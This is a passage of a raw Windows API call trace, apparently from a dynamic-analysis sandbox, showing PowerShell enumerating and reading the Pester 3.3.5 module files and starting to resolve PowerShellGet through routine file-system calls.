(dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0169.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0169.007] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0169.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c630) returned 1 [0169.007] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c710 | out: lpFileInformation=0xb156f8c710*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0169.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0169.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0169.007] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0xb156f8c160, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0169.008] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0xb156f8c390 | out: lpFindFileData=0xb156f8c390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b720 [0169.008] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.008] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0169.008] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0169.009] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0169.009] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.009] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0169.009] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0169.010] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0169.010] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0169.011] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0169.011] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0169.011] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0169.011] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0169.012] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0169.012] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0169.012] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0169.012] FindClose (in: hFindFile=0x1e35146b720 | out: hFindFile=0x1e35146b720) returned 1 [0169.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0169.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c570) returned 1 [0169.012] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0169.012] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0169.012] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0169.013] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0169.013] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0169.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8c370, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0169.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.013] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c8a0 | out: lpFileInformation=0xb156f8c8a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0169.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.013] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0xb156f8c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0169.013] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0xb156f8c520 | out: lpFindFileData=0xb156f8c520*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146bba0 [0169.013] FindNextFileW (in: hFindFile=0x1e35146bba0, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.014] FindNextFileW (in: hFindFile=0x1e35146bba0, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0169.014] FindNextFileW (in: hFindFile=0x1e35146bba0, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0169.014] FindClose (in: hFindFile=0x1e35146bba0 | out: hFindFile=0x1e35146bba0) returned 1 [0169.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.014] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0169.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0169.014] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c910 | out: lpFileInformation=0xb156f8c910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0169.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0169.014] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0169.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5d0) returned 1 [0169.014] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x798 [0169.014] GetFileType (hFile=0x798) returned 0x1 [0169.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c540) returned 1 [0169.015] GetFileType (hFile=0x798) returned 0x1 [0169.015] ReadFile (in: hFile=0x798, lpBuffer=0x1e339905cf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339905cf8*, lpNumberOfBytesRead=0xb156f8c6a8*=0x1000, lpOverlapped=0x0) returned 1 [0169.015] ReadFile (in: hFile=0x798, lpBuffer=0x1e339905cf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339905cf8*, lpNumberOfBytesRead=0xb156f8c6a8*=0x1000, lpOverlapped=0x0) returned 1 [0169.015] ReadFile (in: hFile=0x798, lpBuffer=0x1e339905cf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339905cf8*, lpNumberOfBytesRead=0xb156f8c6a8*=0x1000, lpOverlapped=0x0) returned 1 [0169.015] ReadFile (in: hFile=0x798, lpBuffer=0x1e339905cf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339905cf8*, lpNumberOfBytesRead=0xb156f8c6a8*=0x5e5, lpOverlapped=0x0) returned 1 [0169.015] ReadFile (in: hFile=0x798, lpBuffer=0x1e33990521d, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e33990521d*, lpNumberOfBytesRead=0xb156f8c6a8*=0x0, lpOverlapped=0x0) returned 1 [0169.016] ReadFile (in: hFile=0x798, lpBuffer=0x1e339905cf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339905cf8*, lpNumberOfBytesRead=0xb156f8c6a8*=0x0, lpOverlapped=0x0) returned 1 [0169.017] CloseHandle (hObject=0x798) returned 1 [0169.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0169.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0169.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0169.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0169.026] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0169.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0169.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c630) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c570) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0169.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0169.030] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0169.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5d0) returned 1 [0169.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c540) returned 1 [0169.031] ReadFile (in: hFile=0x798, lpBuffer=0x1e339951480, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8c6a8, lpOverlapped=0x0 | out: lpBuffer=0x1e339951480*, lpNumberOfBytesRead=0xb156f8c6a8*=0x1000, lpOverlapped=0x0) returned 1 [0169.066] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0169.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c490) returned 1 [0169.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c3c0) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c380) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c490) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c3c0) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c380) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c4a0) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c460) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c4f0) returned 1 [0169.068] 